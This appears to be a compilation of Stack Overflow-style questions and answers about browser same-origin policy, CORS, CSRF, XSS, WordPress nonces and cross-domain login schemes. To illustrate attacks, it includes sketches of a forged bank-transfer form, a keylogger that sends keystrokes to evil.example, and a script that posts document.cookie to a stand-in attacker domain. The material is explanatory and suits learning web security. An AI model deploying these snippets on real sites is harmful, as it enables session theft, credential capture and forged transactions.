What are some examples of the attacks that could be made if it were possible?
I run a website that gives away the best free pornography in town. People flock to it.
As they are browsing and viewing the spectacle of colours and moving imagery, an AJAX request works its way through a list of domains, seeing if you are logged in to any of them.
For any you are logged into, it sends another AJAX request to a page on my site that saves whatever data it has found. This way it could steal private information.
Or, it can post data to forms on those pages, along the lines of "send me £1000 from your bank plz k thx".
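A minimal sketch of that second trick, shown here with a hidden auto-submitted form (a classic CSRF vector, which has the same effect as the AJAX post imagined above); the bank URL and field names are made up for illustration:

```js
// Hypothetical forged request; endpoint and field names are assumptions.
var form = document.createElement('form');
form.method = 'POST';
form.action = 'https://bank.example/transfer';
form.innerHTML =
  '<input type="hidden" name="to" value="attacker">' +
  '<input type="hidden" name="amount" value="1000">';
document.body.appendChild(form);
// The browser attaches the victim's bank cookies automatically.
form.submit();
```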
http://en.wikipedia.org/wiki/Same_origin_policy
Why is cross-domain Ajax a security concern?
Cross Site Scripting (XSS), and Cross Site Request Forgery (CSRF)
XSS is injecting third-party code from a secondary site to alter the function of the first, usually via SCRIPT tags. The trust placed in AJAX-related code is already quite high: you'd have to trust that a third-party site would always return the same information, and that your JavaScript was capable of protecting against malformed input. It's fairly easy to demonstrate a remote JavaScript library rewriting an entire page.
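To illustrate that last point, a tiny sketch (the third-party URL is made up):

```js
// Suppose the page trustingly includes:
//   <script src="http://third-party.example/lib.js"></script>
// If that host turns malicious, lib.js can rewrite the whole page:
document.body.innerHTML = '<h1>This page now says whatever I want</h1>';
document.title = 'Rewritten by a third-party script';
```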
CSRF attacks on third-party AJAX would be rife. You log on to a site, and it attempts to post information to other sites, hoping you are logged in to them.
The biggest and most evil thing you could do is a combination of both. Through an insecure text entry, you XSS in some JavaScript that creates a key listener, which buffers keystrokes and then sends them via AJAX to a third party. Of course, this is technically possible as-is, and you could use it to capture logins: though I've yet to prove it, I suspect you could do this by loading images and passing the extra key presses through in the query string, where the target "image" on the third-party domain is a handling script which then logs them.
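A hedged sketch of that keylogger idea (the collector URL is made up; image requests cross domains freely, so the keystrokes ride out in the query string):

```js
var buffer = '';
document.addEventListener('keypress', function (e) {
  // Accumulate keystrokes from the compromised page.
  buffer += String.fromCharCode(e.charCode || e.keyCode);
  if (buffer.length >= 32) {
    // The third-party "image" is really a logging script that
    // records whatever arrives in the query string.
    new Image().src = 'http://evil.example/log.gif?keys=' +
        encodeURIComponent(buffer);
    buffer = '';
  }
});
```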
I suspect you would also be able to hijack sessions this way, as you may be able to obtain session identifiers from the remote computer to pass back.
Of course, a coder would be able to protect against these; it just facilitates quite a large bag of evil.
Recently someone asked me why our website doesn't work without cookies. My explanation was that we need to save tokens and some references in a cookie so that we can use them later to make requests, and that there are only limited options for saving data in the browser. But he wasn't satisfied with my answer, and I also think there may be a few options that could make it work without using cookies/localStorage/sessionStorage.
My question is: why can't most websites work without cookies? Can we make a website work without any storage in the browser?
Using cookies allows your website to remember the user (e.g. their last login, avoiding the need to log in again) and offer corresponding benefits to them and to you (e.g. tracking usage/interest, advertising). If you don't want these benefits then of course you can deliver a website which doesn't use cookies, but if the website needs a login, the user will have to log in on every single page they view.
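As a minimal sketch of what the cookie buys you, assuming a Node/Express backend (all names are illustrative):

```js
const express = require('express');
const app = express();

app.post('/login', function (req, res) {
  // After verifying credentials, remember the user via a session cookie.
  res.setHeader('Set-Cookie', 'session=abc123; HttpOnly; Path=/');
  res.send('logged in');
});

app.get('/profile', function (req, res) {
  // The browser returns the cookie on every request to this origin,
  // so the user doesn't have to log in again on each page.
  const loggedIn = (req.headers.cookie || '').indexOf('session=') !== -1;
  res.send(loggedIn ? 'welcome back' : 'please log in');
});

app.listen(3000);
```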
I am building a WordPress plugin with AJAX and am looking to protect the JSON data from prying eyes and data scrapers.
My thoughts: server-side, I send a nonce in a hidden HTML field within a form, which a jQuery script picks up.
This script then requests some JSON data via GET from a PHP file.
Before responding to the GET request, the PHP file first checks that the nonce is valid and, if so, returns the JSON data. If not, it returns nothing / dies / does something cool to lock out that IP address for a certain amount of time.
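Something like this on the client side (a sketch only: the action and element names are made up, but wp_create_nonce() / check_ajax_referer() and the admin-side ajaxurl global are standard WordPress):

```js
// Server side, the hidden field would be printed with something like:
//   <input type="hidden" id="my_nonce"
//          value="<?php echo wp_create_nonce( 'my_data_action' ); ?>">
jQuery(function ($) {
  $.get(ajaxurl, {
    action: 'my_get_data',            // fires the wp_ajax_my_get_data hook
    _ajax_nonce: $('#my_nonce').val() // the nonce travels with the GET
  }, function (json) {
    // The PHP handler calls check_ajax_referer( 'my_data_action' )
    // before returning the JSON, and dies if the nonce is invalid.
    console.log(json);
  });
});
```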
If a scraper goes directly to the data file with a GET request but the incorrect nonce, no data is returned. If a person peeks into the data file but doesn't have the nonce, they will see nothing... is this correct? I am aware that a nonce is used only once, so even if they have an old nonce, they still won't be able to view the data unless a new nonce is generated by WordPress?
Is this possible or have I completely missed the point of the nonce?
It seems to me like you have the general idea of how WordPress nonces work, but here's some reading anyway:
Mark Jaquith - WordPress Nonces
Vladimir Prelovac - Using Nonces in WordPress Plugins
I think you need to keep in mind a few things:
If all this functionality is primarily utilized on the admin side of WordPress, then you also have to understand that for a scraper to even be considered a threat, it would require the same credentials as a normal user. How can a scraper scrape your admin panel without a username and password? It can't. If you're satisfied with the core security WordPress employs on its own, then your additional nonce functionality is a lot of flash and flair to eliminate a threat that doesn't exist.
If your sensitive data is to be kept apart from the admin panel, then a nonce can be one way of securing it, I suppose, but that's really not the purpose of a nonce. There are many cleaner ways of securing your information than relying on WordPress's nonce functionality, so consider looking into a more relevant alternative.
IP banning is neat and all, but you also have to understand that it is not a foolproof method: IP addresses can easily be faked, and banning them can have unintended consequences. You might succeed in banning the IP address of somebody who attempted to access private information, but what if that person was connecting from behind a shared network? You've effectively banned an entire network from accessing your site, not just a single person.
All in all, you should just make sure that you're using the right tool for any particular job. I think using a nonce for this purpose is certainly possible, but it is far from ideal.
I've done a bit of reading on working around the cross-domain policy, and am now aware of two ways that will work for me, but I am struggling to understand how CORS is safer than having no cross-domain restriction at all.
As I understand it, the cross-domain restriction was put in place because, theoretically, a malicious script could be inserted into a page the user is viewing and send data to a server that is not associated (i.e. not the same domain) with the site the user actually loaded.
Now with the CORS feature, it seems like this can be worked around by the malicious guys, because it's the malicious server itself that authorizes the cross-domain request. So if a malicious script decides to send details to a malicious server that has Access-Control-Allow-Origin: * set, it can now receive that data.
I'm sure I've misunderstood something here, can anybody clarify?
I think #dystroy has a point there, but it's not all of what I was looking for. This answer also helped: https://stackoverflow.com/a/4851237/830431
I now understand that it's nothing to do with prevention of sending data, and more to do with preventing unauthorised actions.
For example: a site that you are logged in to (e.g. a social network or bank) may have a trusted session open with your browser. If you then visit a dodgy site, it cannot make use of the sites you are logged in to (e.g. to post spammy status updates, fetch personal details, or transfer money from your account) because of the cross-domain restriction policy. The only way it could perform those actions would be if the browser didn't enforce the cross-domain restriction, or if the social network or bank had implemented CORS to include requests from untrusted domains.
If a site (e.g. a bank or social network) decides to implement CORS, then it should be sure that this can't result in unauthorised actions or unauthorised data being retrieved; but something like a news website's content API or Yahoo Pipes has nothing to lose by enabling CORS with *.
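To see that trust model in action, a sketch from the dodgy site's point of view (URLs are illustrative):

```js
// Running on dodgy-site.example: this credentialed request may be sent,
// but the browser refuses to expose the response unless mybank.example
// explicitly allows this origin. Note that Access-Control-Allow-Origin: *
// is not even accepted for credentialed (cookie-carrying) requests.
fetch('https://mybank.example/api/balance', { credentials: 'include' })
  .then(function (r) { return r.json(); })
  .then(function (data) { console.log('only if the bank opted in:', data); })
  .catch(function (err) { console.log('blocked by the browser:', err); });
```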
You may set a more precise origin filter than "*".
If you decide to open your specific page to be included in another page, it means you'll handle the consequences.
But the main problem isn't that a server can receive strange data: that's nothing new, and everything a server receives is suspect anyway. The protection is mainly for the user, who must not be abused by an abnormal composition of sources (the enclosing page being able to read the embedded page's data, for example). So if you allow all origins for a page, don't put data in it that you want to share only with your own user.
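For example, a minimal sketch of such a precise filter, assuming a Node/Express server (the allowed origin is made up):

```js
const express = require('express');
const app = express();

const ALLOWED = ['https://trusted-partner.example'];

app.get('/api/public-data', function (req, res) {
  const origin = req.headers.origin;
  if (ALLOWED.indexOf(origin) !== -1) {
    // Only this origin may read the response from a browser page.
    res.setHeader('Access-Control-Allow-Origin', origin);
    res.setHeader('Vary', 'Origin'); // keep caches from mixing origins
  }
  res.json({ hello: 'world' });
});

app.listen(3000);
```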
Why was this policy even created? It seems to me that there are only disadvantages to it. If you want to, there are ways to access another domain anyway (for example, JSONP). Wouldn't it be much easier for everybody if there were no such policy?
But I suppose that the guys who created it are smart and that they did it for a reason. I'd like to know this reason.
The Same Origin Policy is not primarily meant to defend against Cross Site Scripting (XSS), as stated above, but to hinder Cross Site Request Forgery (CSRF).
A malicious site shall not be able to load data from other sites unless that other host explicitly allows it.
E.g. when I browse www.malicious.com, I would not want it to be able to access my concurrent authenticated session at www.mybank.com, request some of my data from the bank's AJAX interface, and send it to malicious.com using my browser as a relay.
To bypass this restriction for intended use or public information the Cross-Origin Resource Sharing (CORS) protocol has been implemented in modern browsers.
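A sketch of the blocked request (the endpoint path is made up):

```js
// Running on www.malicious.com:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://www.mybank.com/ajax/accountSummary');
xhr.withCredentials = true; // would ride on the victim's bank session
xhr.onload = function () {
  // Never reached: mybank.com has not opted in via CORS, so the
  // browser refuses to hand the response to this origin.
  console.log(xhr.responseText);
};
xhr.send();
```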
Security.
If it didn't exist, and your site accepted input from users, I could do bad things. For example, I could put some JavaScript in the text I entered on your site that made an AJAX call to my domain. When anyone viewed my input (like on SO, when we view your question), that JavaScript would execute. I could look at how your website worked in my inspector, add observers to your inputs, and steal your users' data.
The same origin policy is what prevents me from shipping your data off to my domain via AJAX. To see how easy the injection part is, if you have a simple website, just put the following in one of your forms and submit the data.
javascript:alert(document.cookie);
If you don't take steps to do something about that (your framework might do so automatically), I've just injected JavaScript into your site, and when someone views it, it will execute. (It's called JavaScript injection.)
Now imagine I got a little more creative and added some ajax code....
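Something along these lines (my domain is made up; this is exactly the kind of call the policy interferes with, since my server is a different origin from your page):

```js
// Injected alongside the alert above: try to ship the cookie off-site.
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://my-evil-domain.example/steal');
xhr.send(document.cookie);
```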
The browser needs to prevent such things or using the web would be digital suicide.
I see the iframe/P3P trick is the most popular one around, but I personally don't like it because JavaScript + hidden fields + a frame really make it look like a hack job. I've also come across a master-slave approach using a web service to communicate (http://www.15seconds.com/issue/971108.htm), which seems better because it's transparent to the user and robust across different browsers.
Are there any better approaches, and what are the pros and cons of each?
My approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout my application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's' which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
My solution works without script or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie at that URL. I did think of a way of getting around this: when the user first logs in, set up a chain of redirects around every single domain, setting a session cookie at each one. The only reason I haven't implemented this is that it would be complicated: you would need a set order for these redirects and a way to know when to stop, and it would prevent you from expanding beyond 15 domains or so (many more and you come dangerously close to the 'redirect limit' of many browsers and proxies).
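For illustration only (this is not the author's actual code), the satellite's token-handling step might look roughly like this in a Node/Express app, with a hypothetical single-use token store shared with the central domain:

```js
app.get('/sso/landing', async function (req, res) {
  const token = req.query.token;
  // tokenStore is an assumed shared store; consume() deletes on read,
  // making each token single-use.
  const session = await tokenStore.consume(token);
  if (session) {
    // The satellite domain now gets its own session cookie.
    res.cookie('sid', session.id, { httpOnly: true });
  }
  // Redirect to self without the token so it never lingers in the URL
  // (or in logs, bookmarks, or crawler caches).
  res.redirect(req.path);
});
```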
Follow up note: this was written 11 years ago when the web was very different - for example, XMLhttprequest was not regarded as something you could depend on, much less across domains.
That's a good solution if you have full control of all the domains' backends. In my situation I only have client-side (JavaScript/HTML) control on one, and full control on another, so I need to use the iframe/P3P method, which sucks :(.
OK, I seem to have found a solution: you can create a script tag that loads the src of the domain you want to set/get cookies on... so far only Safari seems unable to SET cookies, but IE6 and FF work fine... still, if you only want to GET cookies, this is a very good approach.
The example in that article seems suspicious to me because you basically redirect to a URL which, in turn, passes variables back to your domain in a query string.
In the example, that would mean that a malicious user could simply navigate to http://slave.com/return.asp?Return=blah&UID=123 and be logged in on slave.com as user 123.
Am I missing something, or is it well known that this technique is insecure and shouldn't be used for, well, the things that example suggests (passing user IDs around, presumably to make one's identity portable)?
#thomasrutter
You could avoid having to manage all outbound links on satellites (via appending "s" to querystring) by making an ajax call to check the 'central' domain for auth status on page load. You could avoid redundant calls (on subsequent page loads) by making only one per session.
It would be arguably better to make the auth check request server-side prior to page load so that (a) you have more efficient access to session, and (b) you will know upon page render whether or not the user is logged in (and display content accordingly).
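A sketch of that client-side check (the endpoint is made up; it assumes the central domain permits credentialed CORS requests from the satellites):

```js
if (!sessionStorage.getItem('ssoChecked')) {
  fetch('https://central.example/auth/status', { credentials: 'include' })
    .then(function (r) { return r.json(); })
    .then(function (status) {
      sessionStorage.setItem('ssoChecked', '1'); // one check per session
      if (status.loggedIn) {
        // Kick off the token handshake described in the answer above.
        window.location.search = '?s';
      }
    });
}
```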
We use cookie chaining, but it's not a good solution since it breaks when one of the domains doesn't work for the user (due to filtering / firewalls etc.). The newer techniques (including yours) only break when the "master" server that hands out the cookies / manages logins breaks.
Note that your return.asp can be abused to redirect to any site (see this for example).
You should also validate active session information against domains b, c, d, and so on; that way, you can only log in if the user has already logged in at domain a.
What you do is, on the domain receiving the variables, check the referrer address as well, so you can confirm the link came from your own domain and not from someone simply typing the link into the address bar. This approach works well.
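A sketch of that check, assuming an Express handler (all names made up). One caveat: the Referer header can be absent or forged by non-browser clients, so treat it as a sanity check rather than real authentication:

```js
app.get('/return', function (req, res) {
  const referer = req.headers.referer || '';
  if (referer.indexOf('https://master.example/') !== 0) {
    return res.status(403).send('forbidden');
  }
  // ...proceed to validate the token and establish the session...
  res.send('ok');
});
```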